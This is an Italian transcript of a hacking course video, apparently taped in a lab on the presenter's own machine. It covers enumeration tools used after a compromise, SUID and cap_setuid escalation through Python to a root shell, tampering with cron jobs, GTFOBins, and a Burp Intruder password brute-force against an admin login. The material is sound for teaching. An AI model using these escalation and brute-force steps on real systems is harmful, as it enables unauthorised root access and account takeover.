container. Is the user a member of Docker Group? Yes sono membro del, del docker group sono in quel gruppo perché abbiamo tirato su moltissimi docker no ci fa vedere anche dei processi che stanno correndo per esempio eh, guardate qui cron job ci sono dei cron job yes ci sono puoi scrivere in alcuni pet presenti nel cron job Sì, lo puoi fare ci sta facendo una prima enumerazione a livello superficiale, ci sta dando delle informazioni. Adesso andiamo a fare una enumerazione più in profondità, scegliendo un livello superiore che sia livello 1 o livello 2, e tutte queste informazioni che qui semplicemente vediamo con Yes, lui ce le darà nel dettaglio. Pertanto andiamo a fare una enumerazione più in profondo, gli diamo lo stesso comando e gli diamo per esempio "-l2". Andiamo a fare una enumerazione di livello 2 molto più profonda. Gli diamo Enter e lui comincia a fare le sue cosine. E già ci sta tirando fuori molte, molte più informazioni. Prima ci tirava solamente fuori un Yes su determinate cose. Adesso ci sta tirando fuori un Yes e il dettaglio di quel Yes. Ossia, per esempio, i cron job che avevamo prima, che ci ha, scr ci ha scritto che abbiamo dei processi di cron job, Yes. Adesso sicuramente con un livello di profondità così elevato ci darà Yes, ma ci darà anche tutta la traia, tutta la lista dei cron job che ci sono. Adesso facciamolo finire e poi andiamo a vedere nel dettaglio. Ok, ha finito. E ci ha tirato fuori una marea di informazioni su questa macchina vittima che poi è la mia macchina, no? Abbiamo fatto finta che la mia macchina sia la macchina vittima che abbiamo compromesso. Torniamo in cima e andiamo a vedere quali sono queste informazioni che ci ha tirato fuori, che sono moltissime. Guardate, guardate quanta roba. Questo sarebbe anche meglio eh, quando si dà sto comando di mandarcelo su un file, magari anche grepeabile, come facciamo per esempio quando facciamo lo scan su Nmap, in modo tale che lo possiamo consultare in una maniera più comoda. Guardate quanta roba. Queste sono tutte le interfacce di rete. Non ci arriviamo più all'inizio. <ride> Comunque, ora se ci mettiamo a guardare tutto eh, non, non finiamo più, però lo potete fare tra di voi. Nel senso, guardate qui, qui per esempio abbiamo una lista di shell disponibili e ci dà tutta quanta la lista. Abbiamo il bash, abbiamo ZSH, abbiamo Tmux. Scendendo eh, ci dice altre informazioni, i famosi cron job che abbiamo visto prima, adesso ce li riporta tutti. Ci fa vedere tutti i cron job, i crontab che ci sono esistenti sul sistema e ogni quanto si eseguono. Ci fa vedere i pet dove abbiamo la possibilità di scrivere nel cron job, che sono questi var tmp e tmp ci fa vedere veramente tante informazioni. Io per questo ho desiderato farvi vedere questo, questo strumento. Qui ci fa vedere tutte quante le interfacce di rete. Qui ci fa un routing table, guardate qui. Il name server. Ci tira fuori i permessi. Guardate quanti. Ci tira fuori i sistemi di configurazione con i permessi dei file in ETC System Tamed. e molte, molte, molte altre informazioni. Per questo eh, ribadisco che questo strumento è uno strumento molto, molto valido, molto buono, che ci dà una marea di informazioni una volta che abbiamo compromesso una macchina e cominciamo l'enumerazione di sistema. Proprio ieri sera stavamo nel Discord con i ragazzi e c'era uno degli amministratori del Discord che è Kilberg e aveva appena finito di compromettere una macchina quindi era riuscito a comprometterla ed entrare però naturalmente non era dentro come root, non aveva dei privilegi, era dentro come www data. Pertanto una uno strumento come questo in quel momento sarebbe stato perfetto perché una volta entrato nella macchina lanci questo strumento e ti enumera tutto il sistema ed è lì che poi con tutte le informazioni che ci sta tirando fuori, che ti tira fuori, puoi andare a studiare per cercare di capire come elevare i tuoi privilegi. E oltre a, questa, a questo strumento per fare enumerazione del sistema ne abbiamo anche un altro che è abbastanza buono. E questo qui si chiama LIN Enum. Sì, chiaramente questo è un pochino più vecchiotto di LSE, però è un ottimo strumento anche questo. Andiamo a vedere anche questo. Andiamo a cliccare su eh, LIN Enum SH. Ci andiamo a mettere in RAW anche qui. E ci andiamo a copiare il link con CTRL C. Ce ne torniamo alla console e ci andiamo a scaricare anche questo quindi facciamo un vget del link e ce lo tiriamo giù facciamo un ls e vediamo che è qui anche a lui diamo i permessi di esecuzione e adesso ci andiamo a eseguire quest'altro strumento e vediamo che ce ne, che ci dice gli diamo il tempo per fare tutte le sue cosine e ne sta facendo. <ride> ok, ha finito. Vediamo cosa ci ha trovato anche questo strumento. Molto simile a quello che abbiamo visto precedentemente. Ci ha trovato una marea di informazioni anche lui, anche essendo uno strumento molto più vecchiotto di LSE. Torniamo in cima e vediamo un po'. Guardate quante informazioni, quante cose ci ha tirato fuori: il default root, il name server, listening TCP, listening UDP, l'interfaccia di rete. Guardate, quante ce ne ha tirate fuori tutte quante, anche qui abbiamo i cron tab contents, ci ha tirato fuori anche questo password and storage information, cron job. Available Shell, anche qui, come abbiamo visto nell'altro strumento, pet Information, come vedete eh, sono due strumenti che fanno un'enumerazione di sistema molto, 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 molto dettagliata. E questo è basilare una volta che riusciamo a compromettere una macchina per andare a cercare un sistema, una via per scalare i privilegi, per andare a diventare, come dicevo, root in Linux o NT Authority System. In windows ok adesso andiamo a vedere il processo manuale tanto per cominciare possiamo fare un ai e vedere chi sei sono root puoi fare un id e così vedi in che gruppo sei se per esempio esco da root e faccio un id vedo che sono in molti gruppi e tra questi gruppi vedo anche che sono nel gruppo Docker. E questo potenzialmente già mi dà la possibilità di pensare che potrei fare una scalata dei privilegi dal contenitore. Potrei creare un mount temporale attraverso il quale potrei andare a scalare i privilegi. Questa è una cosa che vedremo più avanti quando andremo a fare la sezione della scalata dei privilegi. Possiamo fare un sudo-l per vedere se abbiamo qualche tipo di permesso assegnato a livello di sudoers possiamo anche andare alla radice e andare a cercarci qualche privilegio suid passiamo un perm meno 4000 e poi facciamo 2 maggiore e lo mandiamo al dev null questo l'abbiamo visto nel corso eh, linux quindi già sapete che i binari che hanno un permesso SWID, se il proprietario è root può essere una cosa critica e per vedere più informazioni qui possiamo per esempio dargli un LS: eh, no, diamoglielo dopo 4000, mi lo diamo qua, meno ls, e così vediamo qualche informazione in più e per esempio possiamo vedere qui che il binario CHSH è del proprietario, il proprietario è root di per sé non è un rischio però dovete sempre ricordarvi che i privilegi suid ci permettono di eseguire il binario corrispondente con privilegi root temporaneamente quindi se tu in, in qualsiasi modo riesci a trovare una via potenziale per andare a iniettare un comando lo puoi eseguire come root per esempio facciamo un esempio dunque se io mi metto qua come root eh, sudo su e vado a cercarmi dove sta python 3 python 3 è qui in user bin python 3 per esempio andiamoci a cercare eh, il python 3.9 facciamo un python python 3.9 E gli diciamo un ls-l e vediamo che ce l'abbiamo qui il 3.9 in user bin. Andiamo a dare i permessi su id, no? Se io, per esempio, gli faccio un chmod u più s a lui e andiamo a dare i permessi, ok? Questa ce la chiudiamo. Se adesso torniamo a fare un find, quello che abbiamo fatto prima. Adesso vediamo questo, user bin Python 3.9. Ci sono dei binari come questo, per esempio, che è molto molto critico che abbiano i permessi suite. Nel senso che adesso io chi sono? Non sono root, sono robi7979. Adesso se io vado a eseguire Python, quindi vado a scrivere Python 3.9 e con il parametro meno c di command. Io posso di forma eh, in maniera interattiva andare a eh, eseguire dei comandi. Se per esempio io do solamente python 3.9, guardate, mi trovo dentro una console, dentro um, un interprete di comando interattivo in tempo reale. E qui dentro che ho eseguito python 3.9, posso eseguire comandi, come per esempio potrei andarmi a importare la libreria OS. E pertanto poi dopo posso andare a eseguirmi un comando, no? Un comando a livello di sistema. E se io gli do Enter, inizialmente lui mi dice che sono robby 7979 non mi sta dicendo che sono root. Però il fatto è che questo binario è suid mi permette di andare a eseguire comandi privilegiati. Per esempio io potrei andare a dirgli che io voglio cambiarmi di user e voglio diventare con set UID root. Se io do enter, come vedete non c'è stato nessun errore o restrizione. Quindi me l'ha permesso perché se adesso io faccio un UAMI, vedete che sono root. E come avete visto io non ho proporzionato, non ho inserito nessuna password per diventare root. Abbiamo visto che quando abbiamo cominciato questa storiella io ero Robby7979, non ero root. Ho fatto questo lavoretto qui e senza inserire nessuna password sono diventato root. Perché? Perché ho sfruttato un binario che aveva i privilegi da root. L'ho sfruttato temporaneamente con questa, questo interprete di comando Python. Pertanto adesso cosa potrei fare? Potrei fare una marea di cose. La prima è lanciarmi una bash. E guardate. Adesso una bash interattiva e sono root, e quindi siamo riusciti a elevare i nostri privilegi e gli strumenti che abbiamo visto come LSE e l'altro precedente, una cosa del genere dovrebbe riuscire ad enumerartela, te lo deve identificare e te lo reporta. Ti fa un report e ti dice anche questa cosa che per esempio abbiamo appena fatto. Adesso, per esempio, per rimettere tutto come stava, per non avere problemi, diciamo puoi andare a dare una pulita e vai a ridare i permessi eh, corretti al binario che abbiamo sfruttato. Qui non ce l'abbiamo. Va bene, ci rimettiamo come root e gli diamo un chmod 755 a user bin python 3.9. Un'altra cosa che possiamo andarci a vedere sono le capability, le capacità. Facciamo un get cap. Vediamo che ce l'abbiamo in user sbin. Anche le capability eh, a volte ti permettono di eseguire determinati comandi, determinate cose a livello privilegiato. Pertanto, noi, per esempio, con get cap possiamo andare con meno R, quindi di forma recursiva dalla radice andarci a cercare se c'è qualcosa e vediamo cosa ci dice. Per esempio, vedete qui per ping abbiamo una capability di tipo net raw, qui abbiamo un F ping, però ok, questo diciamo che inizialmente non è una cosa critica. Però possiamo fare un esempio, no? possiamo fare come abbiamo fatto prima, se facciamo un setCAP e gli diamo eh, cap setUID più e P e gli andiamo a ridare il percorso dove avevamo il Python 3, che era python Python 3.9, Python 3.9. E gli diamo enter, gli è piaciuto. E adesso se andiamo a rifare la ricerca che abbiamo fatto prima, ci dovrebbe tirare fuori anche Python. Vediamo un po'. Ed eccolo qua. In modo tale che io vedo che adesso Python 3.9 ha una capability di tipo set UID. Ora ripeto tutte queste cose le andremo a vedere molto nel dettaglio quando faremo la scalata dei privilegi, però questo è un piccolo un piccolo antipasto, diciamo, ecco. Visto che stiamo facendo eh, la parte di enumerazione del sistema è giusto anche cominciare a vedere queste cosine. Però qual è il discorso? Che se noi facciamo un wish di Python 3.9 e poi gli diamo un xarx ls-l, noi vediamo che il proprietario è eh, root, ma non vediamo che ha la capability. <coughs> Pertanto dobbiamo fare un xarx per get cap. In questo caso possiamo vedere che ha una capability di tipo set uid. Pertanto questa capability ci permette di andare a controllare e a settare l'uid dell'user. Pertanto io posso fare in modo di tornare un'altra volta a operare come root. Adesso siamo dentro come root, io faccio un exit e come abbiamo fatto prima mi vado a eseguire il python un'altra volta 3.9. Rientro nell'interprete ehm, nell di comando, mi rifaccio un'altra volta import os, la libreria, e dopodiché gli dico os.setuid0. Mi do il nostro comando e poi vado a fare un os.system e gli vado a chiedere chi sono, e vediamo chi sono. Sono root un'altra volta. Pertanto anche questa volta posso andare qui e fare un bash. E guardate, so un'altra volta come root in una console interattiva. E si vola. Comunque questo era un, un esempio per eh, una numerazione e eh, una scala di privilegi manuale, però abbiamo visto precedentemente gli altri due strumenti che puoi utilizzare e sono strumenti che sono... Ehm, si possono utilizzare anche nelle varie certificazioni, anche nello scp perché non sono strumenti di esplotazione, sono strumenti di enumerazione. Un'altra cosa che possiamo andare a vedere sono i crontab possiamo fare un crontab-l e andare a vedere se c'è qualche tipo di processo che si sta eseguendo ogni TOT e da chi viene eseguito, però ci dice che no, non c'è nessun tipo di processo, quindi possiamo andare anche a leggere il file etc.crontab. Qui a volte si può vedere che un user o a volte anche root sta eseguendo ogni tot uno script oppure qualcosa, quindi per esempio se vediamo che root sta eseguendo uno script ogni due minuti, eh, vi raccomando di andarvi a vedere il corso che abbiamo fatto di Linux, che abbiamo visto i cronjob, job, Cron tab e tutto. Quindi dicevamo, se io vedo che ogni due minuti root sta eseguendo uno script e io su questo script ho permesso di scrittura, io lo posso andare a manipolare. E quindi poi i due minuti successivi che questo script viene eh, rieseguito un'altra volta eseguirà quello che io gli ho scritto, quello che io l'ho predisposto a fare e lo eseguirà come root perché il proprietario di questo script che si esegue ogni due minuti è root un'altra cosa che potete fare è un system cl uh, ctl e facciamo un list timers e anche qui possiamo vedere che cosa si sta per eseguire e ogni quanto per esempio guardate qui tra 39 secondi si va a eseguire questo sysstatcollect.timer che non so cosa sia. Pertanto a volte <coughs> puoi andare a vedere, a a vedere tutti eh, questi nomi e andare a investigare <coughs> che cosa fanno, di che cosa si tratta e vedere se si possono manipolare. Per esempio un altro strumento automatizzato che ci dà la possibilità di andare a vedere i processi o i comandi che si eseguono su un sistema è eh, questo strumento qui, PSPy andiamocelo a tirare giù uh, eccolo qua, PSPi64 ce l'andiamo a scaricare in download save torniamo alla console ce ne andiamo in download dove l'abbiamo preso <coughs> e ce l'abbiamo qui, PSPi ci mettiamo come sudo e gli andiamo a dare i permessi di esecuzione di eh, PSPi64, ok? E andiamo a vedere un attimino come funziona questo programmino. Naturalmente qui parliamo che tu hai già compromesso la macchina, e quindi una volta che tu hai compromesso la macchina, gli vai a trasferire questo, eh, questo, questa risorsa, questo eh, programma. Una volta che l'hai scaricato sulla macchina vittima e la V, lui in automatico comincia a fare tutte le sue cosine. Comincia a tirarti fuori, come vedete, tutto ciò che viene eseguito sulla macchina dove lo andate a eseguire, tutto ciò che viene eseguito temporalmente. Guardate, per esempio, qui: Target to Hack, o VPS eh, Status, o Ethernet o vps status ancora Ethernet status questi per esempio sono i processi che eh, si vanno aggiornando ogni tot che riguardano la polybar qui dove continua a fare un controllo vi ricordate quando abbiamo fatto i settaggi della polybar nel corso di personalizzazione di Linux lui ogni tot va a controllare lo stato del vpn e no lo stato della nostra scheda eh, di rete per aggiornarci qui e controlla anche qua dove di solito mettiamo l'IP della macchina vittima quindi come vedete ci sta tirando fuori tutti i processi che eh, ogni tot si eseguono. Un'altra cosa che vediamo è quale user sta eseguendo questi comandi. Vedete, UID 1000. E ci dice anche il numero del PID, l'ID del processo. Un'altra cosa che possiamo fare per andare a vedere i comandi eseguiti è un ps-eo-command. Che ti va a fare un report di tutti i comandi che si stanno eseguendo. Vedete, questi sono gli ultimi comandi che ho dato. Sono, eh, ho dato un sudo su per diventare root, ho aperto una zsh e questo è proprio l'ultimissimo comando che ho dato adesso. Una cosa che possiamo aggiungere a questo comando è user. Davanti command possiamo dargli user, virgola e lui adesso ci va a reportare non solo il comando ma anche quale user l'ha fatto. Vedete qui il sudo sudo root, qui è robbie7979, qui è root, qui è root, qui è root perché sto come root. Quindi quello che puoi fare, volendo, è andare anche a crearti uno script con bash per andare a vedere tutti questi processi. Pertanto, per esempio, io posso andare a crearmi un file che chiamerò process.sh Mi vado a togliere questo dollaro qui perché eh, dà quanto fastidio con eh, um, set no list credo che era. Sì, ok, abbiamo tolto. Pertanto ci andiamo a creare uno script di Bash dove gli andiamo a, eh, lo andiamo a utilizzare per andare a eh, vedere questi processi. Possiamo per esempio andare a crearci, tanto per cominciare, una variabile che si chiama ehm, sì, old process e gli vado a dire che questa variabile vale quel comando che abbiamo utilizzato prima, ossia questo. Ve lo ricordate, abbiamo fatto poc'anzi per andarci a vedere gli user e i relativi comandi che sono stati dati. Pertanto, cosa abbiamo fatto fino adesso? Abbiamo creato una variabile che si chiama process e eh, gli stiamo salvando l'output di questo comando che abbiamo visto prima. Ci tira fuori tutti i comandi fatti sul sistema insieme a quale user ha fatto il determinato comando. E adesso per esempio eh, attraverso di un ciclo infinito potrei andare a fare questa cosa. Ossia mi vado a creare una nuova variabile che si chiama stavolta newprocess e gli dico che questa variabile è uguale a questo comando ossia quello che abbiamo messo sopra quindi voi direte, ah, Robert, ma eh, questo è lo stesso comando che ha messo sopra sì, esatto pertanto noi con diff possiamo andare a dirgli che ci deve eh, far vedere la differenza tra la variabile old process con cosa? con la variabile new process, quindi anche qui gli facciamo un eco e gli diciamo la variabile new process. Se avete visto il corso che ho fatto di Linux già sapete che con diff tutto ciò che è differente tra queste due variabili, quindi i nuovi comandi che appaiono, perché abbiamo detto che... Tra il processo del, del primo comando al secondo c'è cioè del tempo. Quindi in questo tempo ci saranno dei nuovi comandi che appaierà, appaiono in new process. Lui con diff ci fa la differenza tra i comandi che ci sono in old process e quelli che ci sono in new process e ce li mostra. E ci rappresenterà questo con un minore eh, i processi che, si, che già ci sono, che si sono tolti, e con un maggiore i nuovi processi però dobbiamo andare a specificargli che cosa vogliamo vedere quindi possiamo fargli un grep e gli andiamo a dire mi devi far vedere le cose che si sono tolte o le cose che si sono aggiunte e glielo diamo con un maggiore e con un minore ora il problema qual è come abbiamo visto prima che abbiamo eseguito il comando io ho un sacco di processi eh, che si rivedono causa questa polybar l'abbiamo visto prima pertanto possiamo andare a fare un altro grep per andare con eh, grep-v che vi ricordate serve per scegliere cosa non far vedere, cosa togliere Per esempio la prima cosa che possiamo andare a dirgli che non vogliamo vedere è command che è un, un, eh, un comando che stiamo eseguendo quindi diciamo command e quando vogliamo andare a togliere più cose contemporaneamente, a questo meno V dobbiamo andare ad aggiungere una E. E poi semplicemente dandogli un altro pipe andiamo a concatenare tutto ciò che non vogliamo vedere. Per esempio ehm, keyworker. Keyworker è un altro processo che rompe molto le palle, che me lo ricordo sempre. E poi che altro possiamo andare a togliere? Adesso non mi viene in mente molte cose, però per esempio guardate qui lo script si chiama process, possiamo andare a togliere questo, non vogliamo vederlo, non ci interessa. E poi vabbè, man mano che avviamo lo script vediamo e possiamo tornare a togliere quello che vogliamo togliere. E per concludere, cosa dobbiamo fare? Dunque, allora abbiamo detto che all process è qui sopra, no? Però qui dentro siamo in un ciclo infinito. Quindi... In questo caso, All Process non si va mai ad, ad attualizzare, ad aggiornare. Però New Process invece sì, si aggiorna. Quindi per far sì che la differenza non sia enorme tra All Process e New Process, perché All Process è il primo comando che andiamo a eseguire, io voglio che anche All Process si, si aggiorni. Pertanto gli possiamo andare a dire che ehm, All Process uguale a new process però qui gli diamo il dollaro ok in modo tale che all process va a salvare l'ultimo valore che è stato salvato da new process pertanto che, che succede così succede che eh, tutto quello che andiamo a salvare dentro all process una volta che si fa la prima iterazione, poi viene aggiornato nella variabile new process. Però continuando a iterare, ora quello che c'è in new process va a finire dentro all process. E il delay, che abbiamo detto prima, quindi il piccolo ritardo che c'è tra il primo comando e il secondo comando, ci tira fuori con la differenza i comandi che stanno, si stanno eseguendo in tempo reale. Ok, poi come tutti i script che andiamo a fare, qui sopra ci andiamo a definire il CTRL-C. Ve lo ricordate? Lo facciamo sempre. CTRL più C e gli andiamo a dare un trap, ctrl c sig int per andargli a fargli capire che stiamo eh, schiacciando CTRL-C. Dopodiché ci andiamo a definire una funzione che appunto si chiama CTRL-C e gli andiamo a dire che cosa vogliamo che faccia quando schiacciamo CTRL-C. E quello che vogliamo come sempre è un eco meno e e gli diciamo che con due salti di linea, quindi 1 e 2, in una maniera carina con un punto esclamativo ci dica terminando puntini puntini gli diamo un altro salto di linea e poi sotto gli andiamo a dire che deve uscire dal programma con un exit 1 ossia un'uscita dal programma forzata ok? questo è quello che facciamo sempre in tutti quanti i script qui ho scritto function ok ok, questo lo andiamo a salvare gli diamo i permessi di esecuzione, quindi facciamo un chmod più x a ah, process che ci permette di andare a vedere i comandi che vengono eseguiti. Proviamo ad avviarlo, però preparatevi perché potrebbe essere una pazzia per tutto quello che esce fuori. Diamo gli enter e vediamo. E per il momento mi sembra che altro che pazzia, non esce nulla. Proviamo ad andare in un'altra finestra e ci apriamo una console proviamo ad aprirci nano poi ce lo chiudiamo torniamo indietro e vedete eccoci qua ha iniziato a tirare fuori tutti i processi guardate qui abbiamo aperto nano eccolo qua andiamo giù se per esempio mi vado a aprire un Firefox qui E torniamo al nostro programmino vedete user library firefox quindi ci sta riportando che abbiamo aperto firefox naturalmente come abbiamo visto prima eh, ps pai è un pochettino fatto meglio e anche il report è un pochino più leggibile però abbiamo capito anche noi eh, da dietro come ci piace creandoci uno script come funziona questo processo se adesso gli diamo un CTRL c Abbiamo il nostro giochino terminando, ok? Facciamo un ultimo esempio, e un ultimo antipasto per quanto riguarda anche la scalata dei privilegi. Se per esempio noi andiamo a fare un witch find, e una volta che abbiamo compromesso una macchina, vediamo che il comando find ha i permessi set with D, possiamo andare in una pagina che voglio già farvi vedere. Che è un'altra pagina Bibbia e si chiama GTFOBINS. Sicuramente molti di voi l'avranno già eh, utilizzata o vista. Questo è un altro sito Bibbia. Pertanto abbiamo detto che siete entrati dentro una macchina, siete riusciti a comprometterla e avete visto che il comando find o qualsiasi altro comando binario eh, ha un permesso SWID. Per esempio, abbiamo preso in considerazione il comando find, quindi andiamo qui. E mettiamo find e guardate un po cosa ci tira fuori che per il binario find function shell file write su ID e sudo e che significa questo significa che con il comando find hai un, un, una possibilità potenziale di ottenere una shell e eh, il suid, quello che abbiamo visto adesso facciamo finta che questo find abbia il privilegio suid, possiamo andare a cliccare qui e lui in automatico ci fa vedere che cosa dobbiamo fare per fare una scalata di privilegi, quindi a andare a diventare da user normale a root, semplicemente copiando questi comandi qui. Pertanto se noi abbiamo visto che il find nella macchina che abbiamo compromesso ha i permessi sued, ce ne veniamo qui, ci prendiamo questo codice. E andiamo a copiarlo nella console della macchina, ci deve dare i permessi di amministrazione, i permessi da root. Non c'è solo questo, ci sono anche le capability. Ve le ricordate? Le abbiamo viste prima. Eccole qua. Se clicchiamo su capability, ci tira fuori tutte quante le capability. Questi sono tutti i binari che potrebbero disporre di una determinata capability, che ci possono permettere di elevare i nostri privilegi. La stessa cosa ce l'abbiamo per il file upload, per la Reverse Shell e per altre cose. Ok, detto questo, ragazzi, ci vediamo al prossimo video dove è l'ultimo della eh, sezione che stiamo facendo. Proprio l'ultimo andremo a dare un'occhiata molto molto più da vicino a Bursuit, perché dopo il video su Bursuit, cominceremo. La prima vulnerabilità dello Wasp Top 10 e hacking web però per questo video è tutto, ci vediamo al prossimo bentornati a tutti sul canale oggi andiamo a fare una bella passeggiata dentro Bursuit per andare a vederlo un pochino meglio perché dopo questo video cominceremo la fase di esplotazione cominceremo tutte le vulnerabilità tra cui molte eh, vulnerabilità web quindi andremo a utilizzare Bursuit eh, molto spesso pertanto dobbiamo sentirci comodi e andare a vedere le ultime cosine che mancano, l'avevamo già visto in altri video. Per fare questo, oggi andremo a utilizzare questa pagina qui, che è lo stesso Docker Compose che ci siamo tirati su per il video precedente. Pertanto, torniamo alla console e ci andiamo a aprire Bursuite. però ce l'andiamo a aprire come utente non privilegiato ce ne andiamo alla radice, ce ne andiamo nella cartella che ci interessa e andiamo a fare come al solito un suite, gli diamo l'appersan maggiore mandiamo tutto al dev null e gli diamo anche il solito comando dyson, che se vi ricordate eh, quando facciamo così è per mandare l'stdr e l'stdout al dev null e con il dyson è per far sì che Adesso aprendo Burtsuit non sia dipendente da questa console, quindi gli diamo ok. E adesso se andiamo a chiudere questa console, vediamo che Burtsuit non muore. Facciamo next, start, chiudiamo l'update. Ok. No, ce l'ha passata di qua, facciamo close. E siamo dentro il nostro Burtsuit. Torniamo alla nostra pagina e andiamo a fare un reset database, tanto per cominciare. Torniamo alla home e poi ci dirigiamo a Search Product PHP Multiple Exercise. Utilizziamo sempre questa pagina qui. Torniamo a Bursuit e ci ricordiamo naturalmente che è settato come proxy alla porta 8080. Ricordo che Bursuit si mette in mezzo tra noi e il server al quale facciamo la petizione, intercetta questa petizione e ci dà la possibilità poi successivamente di manipolarla. Questo l'avevamo già visto, quindi non c'è niente di nuovo. Andiamo come al solito nel nostro browser dove abbiamo settato il Foxy Proxy e gli diamo Bursuit. No? Ve lo ricordate, sì? Adesso fatto questo sappiamo che tutte le petizioni che vengono utilizzate vengono, eh, passano per Bursuite e quindi vengono intercettate. Vedete qui. Ora, adesso lui qui sta intercettando. Vediamo se riusciamo ad allargare un pochino il user interface. Ah, per chi me l'aveva chiesto, qui in user interface display, potete cambiare da light a dark. Questa è la versione dark. Questa la chiudiamo e torniamo a noi. Dunque, siamo su Intercept Proxy, Intercept On, Intercept Off. Ora mettiamo su On e torniamo alla nostra pagina. Abbiamo già settato qui, abbiamo detto il board suit sul Foxy Proxy. Questo l'abbiamo già visto in eh, un altro video. Adesso andiamo qui in questo form e gli diamo Admin e sotto Admin. Gli diamo Submit. Eh, don't Save. E se torniamo al nostro Suite, vediamo che abbiamo intercettato la petizione. Vedete qui sotto, admin, admin. Adesso qual è l'idea? L'idea è mandare questa petizione al repeater. Possiamo farlo con tasto destro e send to repeater. Oppure possiamo fare un CTRL R. Vedete che questa tab repeater sia illuminata di rosso. Se ci clicchiamo, siamo alla request del repeater. Eccolo qua. Naturalmente queste eh, questi tab qui le possiamo andare anche a rinominare, a metterci, a scriverci quello che vogliamo. Per esempio andiamo a scrivere SQL test. Qui potete mettere quante eh, tab volete, 8, 9, 10, per organizzare meglio il lavoro. E poi naturalmente da eh, quest'altro tag possiamo andare a scegliere come settare, per esempio vedete qui abbiamo la request e sotto la response, se io per esempio faccio così, mi mette la response a destra e la request a sinistra. A me piace più così, voi potete metterlo come preferite. Anche se questa sembra la precedente, possiamo fare un forward ed ecco qui che siamo passati alla successiva, ossia l'attuale, vedete dove abbiamo messo test test. Come abbiamo capito questa è l'intercettamento della richiesta, però eh, abbiamo anche visto che per vedere la risposta dobbiamo andare su eh, Repeater con il Ctrl R o cliccando col tasto destro sento Repeater. Però c'è anche un'altra cosa che possiamo fare, possiamo andare a vedere la risposta direttamente qui. Se noi gli diamo do intercept response to this request e facciamo forward, ecco qui che abbiamo la risposta, la possiamo vedere tranquillamente qui. Se per esempio andiamo a dare render ci fa vedere la risposta il sito, ossia invalid password perché abbiamo messo test test. Ingrandiamolo un po' che si vede meglio. Okay. Ora vi chiederete perché ci interessa fare questo, perché spesso e volentieri quando andiamo a fare una tramitazione, un, un, un passaggio dalla richiesta alla risposta, spesso e volentieri andiamo a vedere un codice 200 ok come questo oppure un 301 ossia c'è un eh, reindirizzamento in un altro posto, in un'altra pagina, pertanto spesso e volentieri ci sono dei contenuti interessanti e tu quello che puoi fare è andare a cambiare questo 200, ossia puoi obbligarlo a non fare quel reindirizzamento su un'altra pagina, su un altro posto, pertanto puoi anche riuscire a vedere il contenuto di quello che ci sarebbe stato prima che ti eh, ridirige in un altro sito perché può sempre capitare che magari c'è una web che sta montata male, creata male. Pertanto se tu eh, forzi il redirect, riesci a vedere quello che c'è, magari riesci a vedere una pagina privilegiata con eh, informazioni importanti. E come possiamo fare tutto questo, no? Per esempio qui abbiamo ehm, la risposta, no? Quindi abbiamo un 200 ok. Diciamo che io voglio cambiare questo valore. Beh, ce ne possiamo andare su option andiamo qui su eh, match and replace rallys facciamo un add e selezioniamo eh, response header perché questa è la response header questa è la response body e qui andiamo a mettere che quello che è 200 ok lo vogliamo far diventare un pff, 201 che non esiste prova andiamo ok e vediamo che lui in fondo ci ha messo questa nuova regola, qui possiamo chiudere. Adesso facciamo un intercept off, torniamo alla pagina, rimettiamo test test, facciamo submit. Torniamo al nostro board suite, facciamo Ah, non abbiamo fatto intercept on, rifacciamo. <coughs> test test submit. Torniamo a board suite, qui abbiamo la richiesta Rifacciamo do intercept, la risposta, respost. facciamo forward e vediamo che qui è cambiato. Adesso non abbiamo più 200, ok, abbiamo 201, prova quello che abbiamo messo noi, quello che abbiamo cambiato noi, quello che abbiamo manipolato noi. Ok, altre cosine da vedere, eh, l'http history, qui vediamo tutto lo storico della navigazione, eccetera, qui abbiamo eh, un filtraggio per i metodi, get e post. Se vuoi andare a filtrare più nel dettaglio puoi cliccare qui e ti esce fuori questa finestra dove puoi andare a scegliere quali filtri ti interessano, puoi farlo per i filtri mime oppure puoi farlo per lo status code, per il codice di stato che ti dà. L'unica cosa negativa è che se vuoi andare a filtrare per una parola concreta, per una parola specifica, vedete qui mette Pro Only, quindi solamente se avete la versione a pagamento. Adesso torniamo dove stavamo prima e andiamo a vedere un pochino l'intruder. Reintercettiamo la solita petizione, andiamo qua, rimettiamo test. Test. Qui abbiamo il proxy attivo? No. Lo attiviamo, facciamo submit e torniamo a Burp Per passarlo all'intruder e andarci a vedere l'intruder, come al solito possiamo fare tasto destro, send to intruder. E, ehm, la tab intruder diventa di colore arancione, oppure possiamo fare un ctrl-i, un ctrl-r, era per, per il repeater, un ctrl-i è per l'intruder. Adesso se andiamo su attack type, <coughs> vediamo che abbiamo quattro tipi di attacco, ossia lo sniper, il battering ram, il pitchfork e il cluster bump, no? E qui a destra vediamo add, clear, auto, refresh. Se a voi esce che già avete delle cosine selezionate potete semplicemente fare clear e ve lo mette come ce l'ho io, quindi puliamo tutto quanto. Perché lui in automatico ti va a selezionare dei campi. Adesso però noi andiamo a fare un add e andiamo a selezionare i campi che ci interessano per fare questo attacco sniper. Per esempio andiamo sotto a cercare una password per un, eh, un user che sappiamo che esiste. Per esempio noi sappiamo che esiste eh, admin ma non sappiamo la password. Quindi possiamo andare a selezionarci il campo della password e andare a fare add. Come vedete qui <coughs> escono eh, due ricamini al lato e viene evidenziato questo campo perché così gli abbiamo specificato che è questo è il campo dove vogliamo che va a fare l'attacco, dove va a lavorare. Pertanto abbiamo detto che il primo che vediamo è lo sniper. Questo tipo di attacco usa un payload per un singolo campo. Quindi se adesso ce ne andiamo su Payload, e se per esempio andiamo su Payload Sets, vediamo che c'è solamente uno. Apriamo il menu a tendina, non ci dà la possibilità di selezionare più campi, ma uno solo, appunto perché è un attacco sniper. Ce ne andiamo sotto a Payload Setting e facciamo Load e ci andiamo a cercare un dizionario da utilizzare. Per esempio, potremmo utilizzare Seclist, che si trova in uh, User, Share, dovremmo avercelo qui, Seclist, se ce l'ho su questo Parrot, eccolo qua, Seclist. Vi ricordo che Seclist non viene di default, è un repository di GitHub che... Ha una marea di directory e eh, di dizionari molto interessanti che vi consiglio di scaricare. Mettete download, seclist eh, seclist GitHub, lo trovate lì. Ora, per esempio, ce ne possiamo andare a password e possiamo andare a cercarci un dizionario da utilizzare. Per esempio, possiamo utilizzare eh, xato next 10 million password sopra abbiamo 10.000 credo che siano, sì, 10.000 10 password più comuni, facciamo open, e non vi raccomando di utilizzare RockQ qui perché c'ha veramente troppe password e probabilmente Bursuit non ce la fa, quindi vi consiglio di utilizzare questo tipo di eh, dizionario. E adesso che abbiamo caricato tutte queste password, per questa posizione che noi abbiamo selezionato utilizzando il tasto add, lui che cosa fa? Ci va a provare tutte queste password che gli abbiamo inserito. Quindi, 